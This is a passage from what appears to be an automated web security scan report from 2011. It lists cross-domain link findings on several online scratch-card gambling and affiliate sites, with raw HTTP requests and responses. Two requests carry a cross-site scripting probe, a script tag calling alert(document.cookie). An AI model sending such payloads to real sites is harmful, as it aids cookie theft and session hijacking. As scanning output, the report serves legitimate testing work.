<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Super-3-Wow.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl05_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl05_gameName">
...[SNIP]...
<a href="/en/Slots/Legend-Of-Terra" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl06_lnkGame" onclick="openScratchClientWindow(0, 4, 89, '101', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Legend-Of-Terra.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl06_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl06_gameName">
...[SNIP]...
<a href="/en/Classic/Golden-Fortune" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl07_lnkGame" onclick="openScratchClientWindow(0, 0, 86, '90', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Golden-Fortune.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl07_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl07_gameName">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl00_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl01_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/DE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl02_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl03_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl04_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl05_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl06_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/DE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl07_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl08_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl09_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl00_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl01_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/TR.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl02_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/TR.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl03_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div class="service-info overlay"><a href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.BETSSON.COM&lang=en">VeriSign Secured</a>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

18.13. https://scratch.betsson.com/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /en/?navbar=true HTTP/1.1
Host: scratch.betsson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:42:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:42:26 GMT; path=/
Set-Cookie: ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:42:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:42:26 GMT; path=/
Set-Cookie: ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:42:26 GMT
Content-Length: 160216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<!-- cphCssDefault -->
<link media="all" href="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreCSSV2_v95924.css" type="text/css" rel="StyleSheet" />


<link media="all" href="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterCSS_v2983.css" type="text/css" rel="StyleSheet" />

<style type="text/css" media="screen">
...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
<a onclick="getIsland('StartPage.aspx','divMain','',true);return false;" href="/en/Default.aspx" >
<img src="https://ble.hs.llnwd.net/e1/scratch/en/productLogo.gif" alt=""/>
</a>
...[SNIP]...
<span id="ctl00_ctl00_cphMain_cphMain_ctl00_Gametip"><a href="https://scratch.betsson909.com/en/Casino/Slot-Super-7">Try our classic Slot Scratch card, Super 7 now!</a>
...[SNIP]...
<a href="/en/Classic/3-Wow" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl00_lnkGame" onclick="openScratchClientWindow(0, 0, 42, '41', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_3-Wow.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl00_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl00_gameName">
...[SNIP]...
<a href="/en/Slots/Sea-And-Sun" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl01_lnkGame" onclick="openScratchClientWindow(0, 4, 88, '92', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Sea-And-Sun.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl01_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl01_gameName">
...[SNIP]...
<a href="/en/Slots/Holiday-Hotel" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl02_lnkGame" onclick="openScratchClientWindow(0, 4, 87, '89', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Holiday-Hotel.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl02_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl02_gameName">
...[SNIP]...
<a href="/en/Classic/7th-Heaven" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl03_lnkGame" onclick="openScratchClientWindow(0, 0, 62, '58', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_7th-Heaven.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl03_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl03_gameName">
...[SNIP]...
<a href="/en/Classic/Jungle-Joy" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl04_lnkGame" onclick="openScratchClientWindow(0, 0, 53, '45', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Jungle-Joy.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl04_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl04_gameName">
...[SNIP]...
<a href="/en/Classic/Super-3-Wow" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl05_lnkGame" onclick="openScratchClientWindow(0, 0, 76, '79', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Super-3-Wow.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl05_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl05_gameName">
...[SNIP]...
<a href="/en/Slots/Legend-Of-Terra" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl06_lnkGame" onclick="openScratchClientWindow(0, 4, 89, '101', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Legend-Of-Terra.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl06_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl06_gameName">
...[SNIP]...
<a href="/en/Classic/Golden-Fortune" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl07_lnkGame" onclick="openScratchClientWindow(0, 0, 86, '90', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Golden-Fortune.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl07_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl07_gameName">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl00_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl01_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/DE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl02_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl03_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl04_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl05_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl06_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/DE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl07_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/PL_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl08_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div>
<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__recentWinnersList_RightNowWinnerItem_ctl09_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl00_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/TR.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl01_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/SE_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl02_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/TR.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
</a>

<img id="ctl00_ctl00_cphMain_cphMain_ContentRight__winnerList_rptTopLists_ctl03_imgFlag" class="flagIcon" src="https://ble.hs.llnwd.net/e1/scratch/neutral/FI_v1.gif" style="height:12px;width:22px;border-width:0px;" />
<span class="name">
...[SNIP]...
<div class="service-info overlay"><a href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.BETSSON.COM&lang=en">VeriSign Secured</a>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

18.14. http://scratch.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:18 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:18 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:25:18 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:18 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<div style="visibility:hidden; height:0px;">
<a href="http://www.hopa.com/visit.aspx?csi=10&amp;CorID=deleted&amp;SentDate=&amp;CorExpTime=&amp;" class="iframe" >Iframe Content</a>
...[SNIP]...
<area href="/over-18/" alt="" coords="303,0,333,50" />
<area href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en" alt="" coords="332,0,401,50" class="popupwindow" />
<area href="http://www.neogames.com/" alt="" coords="450,0,542,50" onclick="window.open(this.href);return false;" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" alt="" coords="400,0,449,50" class="popupwindow" />
<area href="http://www.gamcare.org.uk/" alt="" coords="542,0,571,50" onclick="window.open(this.href);return false;" />
<area href="http://www.gambleaware.co.uk/" alt="" coords="572,0,635,50" onclick="window.open(this.href);return false;" />
<area href="http://www.lga.org.mt" alt="" coords="636,0,755,50" onclick="window.open(this.href);return false;" />
</map>
...[SNIP]...
</a>. Make sure you <a href="http://twitter.com/ukscratch" rel="external">follow us on Twitter</a> &amp; <a href="http://www.facebook.com/#/pages/Scratchcouk/196196857653?ref=ts" rel="external">Join us on Facebook</a>
...[SNIP]...
<p class="foottext">Scratch.co.uk are not affiliated in any way with <a href="http://www.national-lottery.co.uk" rel="external">The National Lottery</a> &reg; <a href="http://www.national-lottery.co.uk/player/p/help/scratchcard.ftl" rel="external">Scratchcards</a>
...[SNIP]...
ered in Malta (a member of the EU since May 2007). The Company's registered address is at 135 High Street, Sliema, Malta. The Company operates Scratch.co.uk under a license issued and regulated by the <a rel="external" href="http://www.lga.org.mt/lga/home.aspx">Lotteries and Gaming Authority</a>
...[SNIP]...

18.15. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/Lobby.aspx

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lql2vynmt5oxqjekwkix5xmj; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19412


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<!-- START SCANALERT CODE -->
<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secure.neogames-tech.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/secure.neogames-tech.com/55.gif" title="McAfee SECURE sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" /></a>
...[SNIP]...
<td style="font-size:0px;background-image:url(images/seal_background.png);background-repeat:repeat-x;">
                        <a target="_blank" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=da"><img src="images/seal_verisign.png" width="83" height="37" title="This page is protected by VeriSign." border="0" />
...[SNIP]...

18.16. https://secure.neogames-tech.com/ScratchCards/js/LoadObjects.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/js/LoadObjects.js

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /ScratchCards/js/LoadObjects.js?v1.0.2011-2.1.66 HTTP/1.1
Host: secure.neogames-tech.com
Connection: keep-alive
Referer: https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CSI=1&CUR=GBP&LNG=~ENG&AFI=&MMI=0&CKI=&AR=&PAR=&RegistrationMode=PM&BO=FM&SDN=Scratch2Cash.com&__utma=-&__utmb=171482274.1.10.1305548356&__utmc=171482274&__utmx=-&__utmz=-&__utmv=-&__utmk=22205543
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; ASP.NET_SessionId=5p03ge55er42ijbnracipjyy

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sun, 08 May 2011 13:56:46 GMT
Accept-Ranges: bytes
ETag: "0a3c6c487dcc1:1396"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:46:49 GMT
Content-Length: 5318

function LoadLobby(pCSI, pBGColor, pSKI, pCUR, pLNG, pAFI, pMMI, pAR, pPAR, pDS, pAPIURL, pShortcutInstalled, pVersion, pWBA, pMUB, pRegistrationMode, pBO, pSkinDomainName, pSlogan, pSkinName, pBrowse
...[SNIP]...
RED=' + pCorrespondenceExp + pHistoryParams + pUniqueVisitorID;
// send GID if not exist
if (strFlashVars.indexOf("GID") == -1) {
strFlashVars +="&GID=" + pGID;
}


s = '<OBJECT id="scratch2a" codebase="https://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" \n';
s += '    height="' + iHeight + '" width="' + iWidth + '" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000">
\n';
s += '    <PARAM NAME="WMode" VALUE="' + (navigator.appName == 'Microsoft Internet Explorer' ? 'opaque' : 'window') + '">
...[SNIP]...

18.17. https://www.aspireaffiliates.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.aspireaffiliates.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...
<p><img class="AffiliatesHomeRightContentTextImage aligncenter" style="cursor:pointer;" onclick="goto('sign-up');" onmouseover="this.src=&quot;https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNowOver.gif&quot;" onmouseout="this.src=&quot;https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif&quot;" src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif" border="0" alt="" /><span class="AffiliatesHomeRightContentText" style="font-size:10px;">
...[SNIP]...
<td>
<img class="AffiliatesFooterSpamImage" border="0" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif" alt="">
</td>
...[SNIP]...
<div id="footban"><img src="https://download.neogames-tech.com/Resources/FlashBanners/20155/Banner.swf"></div>
...[SNIP]...

18.18. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.aspireaffiliates.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...
